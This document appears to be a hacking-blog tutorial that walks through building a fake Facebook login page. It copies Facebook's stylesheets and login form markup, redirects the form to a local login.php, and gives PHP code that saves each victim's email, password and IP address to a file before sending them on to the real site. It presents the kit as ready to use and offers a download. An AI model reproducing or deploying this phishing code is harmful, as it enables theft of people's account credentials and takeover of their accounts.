0
                                                    Create Any Phishing Page Easily



Hello guys today i'll show you how to Create Any Phishing Page Easily ( Undetected, Clean And True Login )

So How to Make A phishing Page ? And what We need ?


  • Snipping Tool, Paint ( Windows Utilities )
  • A Little Knowledge about Html web designing Language
  • Your Brain 
First of All, Chose Your Target Website, For example Today we will work on Facebook So Open Facebook And Snipping Tool Now You have to capture Page Only Using Snipping Tool Like This :


Now, Edit It With Ms Paint ( We gonna Remove Input Boxes, Submit Button ) So it will be Like This :


So , This Is the Final Background Picture :


Now, After Designing our fake page background, Let's Insert Input Boxes And Start Designing Our Html Page !
Create New folder Called "phishing" Open it and create new text document called index.php ( make sure that file extension is .php ! ) 
Edit The php File, I advice you to use notepad ++ if you don't have don't worry just use notepad !
And Copy The Background Image to The folder " phishing " and call it bg.png.
go to your target site and get input styles and input html code but at first let's write simple code :

<html> <!-- Start Html coding, don't Worry you wont delete this cause it is just a comment -->
<head>
<title>Facebook | Login </title> <!-- This Is Page Title, You can Change it By your Target Title like twitter so it will be twitter | login for example -->
</head> 
<body> 
<body background="bg.png">
</body> 
</html> 
Now, When Opening This page , It will appears Like This :
Don't forget, This is our Folder Content :

Now let's Insert Input Boxes And Submit Button, But At first We should Get The Style Of our target , Go to your site And ClickCTRL + U it will shows you Site Html code, Copy Styles Part And Paste It Into your Phishing Page Source So it will be like this :


This Is Facebook Style :
<link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yD/r/lk0C_M8-L52.css" data-bootloader-hash="6Nxiy" data-permanent="1" />
<link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yL/r/x3bsMJyVkPp.css" data-bootloader-hash="HgIa3" />
<link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yq/r/fPkkAMrgVCE.css" data-bootloader-hash="3GDgT" data-permanent="1" />
Now Just We need to place our Input Boxes :

Go to your site , Click CTRL + U And Search for ( CTRL + F ) " <form " And Copy Source , Like This :

And This Is Form Tag Of Facebook :

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post">
<input type="hidden" name="lsd" value="AVr3LOSr" autocomplete="off" />
<table cellspacing="0" role="presentation">
<tr>
<td>
<input type="text" class="inputtext" name="email" id="email" value="" tabindex="1" />
</td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2"/>
</td>
<td>
<label class="uiButton uiButtonConfirm" id="loginbutton" for="u_0_l"><input value="Connexion" tabindex="4" type="submit" id="u_0_l" />
</form>
Sure, If you have any knowledge about html language, you can Change Somethings To make it Better Like I did .

So , Our Script Will Be Like This :

And, Our Web page Will Be like This : 

You see, It's Not Our Needed Position :-( But we can Try to move Input Boxes Using Blank Space Code ( &nbsp; ) Using Hundreds Of Black Spaces We can Change Our Form Position To our favorite Position , Like This :


All Done , Our Webpage now Completed Successfully !


Now, We need to do some edits On Script So you will need to replace " action="https://www.facebook.com/login.php?login_attempt=1" " by " action="login.php" "  And " name="email" " By " name="em" " and " name="pass" " by " name="ps" " Like This :


Now All Done , You need just to create Another File In phishing Folder Called " login.php " edit it using Note pad And Copy This Code and paste It :

<?php
$email = $_POST['em'];
$em = htmlentities($email);
$pass = $_POST['ps'];
$ps = htmlentities($pass);
//----------------------------
$ip = getenv("REMOTE_ADDR");
$ip = htmlentities($ip);
$date = date("Y/m/d");
$file = fopen("rezult.html","a+");
$table = "<br><br><font size=4>Email ADDRESS : $em</font><br><br><font size='4'>PASSWORD : $ps</font><br><br>+---------------------------------+";
fwrite ($file, $table);
fclose($file);
header("Location:https://facebook.com");
?>

Done ! Now Your Phishing Page is Ready For use ! When You login , You will see stored Logins On rezult.html , I know This Tutorial It's A little bit difficultYou can Download Today project ( facebook Phishing Page ) From here :

Download  

And Good bye 

Post a Comment

 
Top